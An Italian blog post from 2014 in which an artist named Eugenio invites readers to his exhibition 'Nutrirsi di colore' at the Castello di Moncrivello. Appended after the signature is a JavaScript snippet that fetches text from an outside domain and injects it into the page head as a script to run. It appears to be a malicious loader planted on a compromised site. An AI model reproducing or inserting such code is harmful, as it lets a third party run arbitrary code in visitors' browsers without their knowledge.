INVITO
2 Aprile 2014
Nessun commento
Article
Ti invito alla mia esposizione al Castello di Moncrivello (VC)
“Nutrirsi di colore”
Un abbraccio,
Eugenio
var url = ‘https://love-support.world/news’; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.textContent = data; document.getElementsByTagName(‘head’)[0].appendChild(script); })